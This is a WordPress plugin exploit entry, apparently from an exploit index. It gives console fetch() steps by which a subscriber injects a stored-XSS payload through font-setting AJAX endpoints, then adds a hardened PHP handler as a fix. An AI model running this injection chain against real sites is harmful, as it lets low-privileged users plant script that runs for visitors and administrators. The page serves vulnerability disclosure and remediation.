## https://sploitus.com/exploit?id=WPEX-ID:DF12513B-9664-45BE-8824-2924BFDDF364
1. Log in with a subscriber account and visit https://vulnerable-site.tld/wp-admin/profile.php?action=delete
2. Paste the following in your browser's console:
```
fetch("/wp-admin/admin-ajax.php?action=gsf_change_font", {
  method: "POST",
  headers: { "content-type": "application/x-www-form-urlencoded" },
  body: `_nonce=${GSF_META_DATA['nonce']}&font_data[kind]=custom&font_data[selector]=ppppp`,
})
  .then((response) => response.text())
  .then((data) => { console.log(data); });
```
3. And then the following:
```
fetch("/wp-admin/admin-ajax.php?action=gsf_save_active_font", {
  method: "POST",
  headers: { "content-type": "application/x-www-form-urlencoded" },
  body: `_nonce=${GSF_META_DATA['nonce']}&font[0][kind]=custom&font[0][selector]=");alert(1);//`,
})
  .then((response) => response.text())
  .then((data) => { console.log(data); });
```
4. Visit the site to witness our malicious script running, triggering an alert box.
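As an added, defender-side illustration (not the plugin's or the advisory's own code): a hardened handler for the `gsf_save_active_font` action that closes both halves of the chain above, the missing capability check that lets a subscriber reach the endpoint with only a nonce, and the unescaped `selector` value that later lands in an inline script. The nonce action name, the option name and the set of accepted font kinds are assumptions; none of them appear on the page.

```php
<?php
// Hypothetical hardened replacement for the gsf_save_active_font AJAX handler.
// Written for illustration; it is not the plugin's code.
add_action( 'wp_ajax_gsf_save_active_font', 'hardened_gsf_save_active_font' );

function hardened_gsf_save_active_font() {
    // A nonce proves the request came from a page the user loaded, not that the
    // user is allowed to change site-wide settings: GSF_META_DATA['nonce'] was
    // readable by the subscriber in the PoC. Check the nonce AND a capability.
    check_ajax_referer( 'gsf_nonce_action', '_nonce' ); // nonce action name assumed
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'insufficient permissions', 403 );
    }

    $fonts = ( isset( $_POST['font'] ) && is_array( $_POST['font'] ) )
        ? wp_unslash( $_POST['font'] ) : array();
    $allowed_kinds = array( 'custom', 'google' ); // assumed set of kinds
    $clean = array();

    foreach ( $fonts as $font ) {
        $kind     = isset( $font['kind'] ) ? sanitize_key( $font['kind'] ) : '';
        $selector = isset( $font['selector'] ) ? sanitize_text_field( $font['selector'] ) : '';

        // Allowlist the selector: only characters a CSS selector needs. Quotes,
        // parentheses and semicolons (the breakout characters in the PoC) fail here.
        if ( ! in_array( $kind, $allowed_kinds, true )
            || ! preg_match( '/^[A-Za-z0-9_\-\.#:\s>\[\]=,*]{1,200}$/', $selector ) ) {
            wp_send_json_error( 'invalid font entry', 400 );
        }
        $clean[] = array( 'kind' => $kind, 'selector' => $selector );
    }

    update_option( 'gsf_active_fonts', $clean ); // option name assumed
    wp_send_json_success( $clean );
}

// When the stored value is emitted into an inline script, JSON-encode the whole
// structure instead of concatenating strings, so no stored value can close the
// surrounding quote or parenthesis even if the allowlist above were relaxed.
function hardened_gsf_print_active_fonts() {
    $fonts = get_option( 'gsf_active_fonts', array() );
    echo '<script>var gsfActiveFonts = ' . wp_json_encode( $fonts ) . ';</script>';
}
add_action( 'wp_head', 'hardened_gsf_print_active_fonts' );
```

The same two controls (capability check, then allowlisted input) apply to `gsf_change_font`, since the PoC reaches it with the same subscriber-visible nonce.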